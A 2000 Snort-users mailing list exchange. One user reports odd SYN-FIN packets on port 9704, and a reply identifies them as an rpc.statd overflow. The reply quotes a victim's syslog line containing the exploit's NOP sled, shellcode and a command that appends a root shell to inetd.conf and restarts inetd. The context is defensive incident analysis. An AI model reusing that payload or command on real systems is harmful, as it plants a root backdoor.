[Snort-users] Odd packets... maybe a new Trojan?

Frank Reid fcreid at ...691...
Wed Oct 25 21:22:50 EDT 2000


Copied from another source:

Yup. 9704 is the port added to inetd by a pretty well-known overflow for 
rpc.statd: 


Aug XX 17:13:08 victim rpc.statd[410]: SM_MON request for hostname 
containing '/': ^D^D^E^E^F ^F^G^G08049f10 bffff754 000028f8 4d5f4d53 
72204e4f 65757165 66207473 6820726f 6e74736f 20656d61 746e6f63 
696e6961 2720676e 203a272f 
000000000000000000000000000000000000000000000000000000000000000000000000 
00000000 
000000000000000000000000000000000000000000000000000000000000000000000000 
00000000 
000000000000000000000000000000000000000000000000000000000000000000000000 
00bffff7 
0400000000000000000000000000000000000000000000000bffff7050000bffff706000 
00000000 
000000000000000000000000000000000000000000000000000000000000000000000000 
00000000 
000000000000000000000000000000000000000000000000000000000000000000000000 
00000000 
0000000000000bffff707<90><90><90><90><90><90><90><90><90><90><90><90><90 
><90><90 
><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90 
><90><90 
><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>K^<89>v<83> 
<8D>^( 
<83> <89>^<83> <8D>^.<83> <83> <83>#<89>^ 
1<83> 
<88>F'<88>F*<83> <88>F<89>F+, 
<89><8D>N<8D>V<80>1<89>@<80>/bin 
/sh -c echo 9704 stream tcp 
nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd 


...and BONK! they have a rootshell running on 9704. 


See http://www.securityfocus.com/bid/1480 


I'd let the owners know, pronto. Alternatively if you have any control 
over them, get them unplugged. 



-----Original Message-----
From: snort-users-admin at lists.sourceforge.net
[mailto:snort-users-admin at lists.sourceforge.net]On Behalf Of Tom Whipp
Sent: Wednesday, October 25, 2000 05:07
To: snort-users at lists.sourceforge.net
Subject: [Snort-users] Odd packets... maybe a new Trojan?
Importance: High


Hi all,

	I got scanned last night, but I haven't the faintest idea what this
signature represents... about half the hosts in my subnet got the following
packets allegedly from an Iranian university network.

Source/Dest port	9704
ID			39426
Ack			0x7A019CB1

Given that the ID and ack are identical in all packets it doesn't look like
a vanilla port scan, so my guess is that this represents the initial stage
of a Trojan client/server connection... but of course that's complete
conjecture.

I've tried to check whitehats but can get in, I've done some general web
searches but can't find anything and I've taken a look in the 10102k.rules
file but it doesn't seem to have any equivalent rule.

any thoughts?

	Tom

PS:

Here is an extract from my logs... not sure if it will tell you anything
more than above but it seems worth a shot.

[**] SCAN-SYN FIN [**]
10/24-18:40:33.351849 213.29.27.30:9704 -> xxx.xxx.xxx.1:9704
TCP TTL:21 TOS:0x0 ID:39426
**SF**** Seq: 0x263B3402   Ack: 0x7A019CB1   Win: 0x404

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] SCAN-SYN FIN [**]
10/24-18:40:33.451830 213.29.27.30:9704 -> xxx.xxx.xxx.2:9704
TCP TTL:21 TOS:0x0 ID:39426
**SF**** Seq: 0x263B3402   Ack: 0x7A019CB1   Win: 0x404

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] SCAN-SYN FIN [**]
10/24-18:40:33.454766 213.29.27.30:9704 -> xxx.xxx.xxx.3:9704
TCP TTL:21 TOS:0x0 ID:39426
**SF**** Seq: 0x263B3402   Ack: 0x7A019CB1   Win: 0x404

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] SCAN-SYN FIN [**]
10/24-18:40:33.462549 213.29.27.30:9704 -> xxx.xxx.xxx.5:9704
TCP TTL:21 TOS:0x0 ID:39426
**SF**** Seq: 0x263B3402   Ack: 0x7A019CB1   Win: 0x404

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


_______________________________________________
Snort-users mailing list
Snort-users at lists.sourceforge.net
http://lists.sourceforge.net/mailman/listinfo/snort-users





More information about the Snort-users mailing list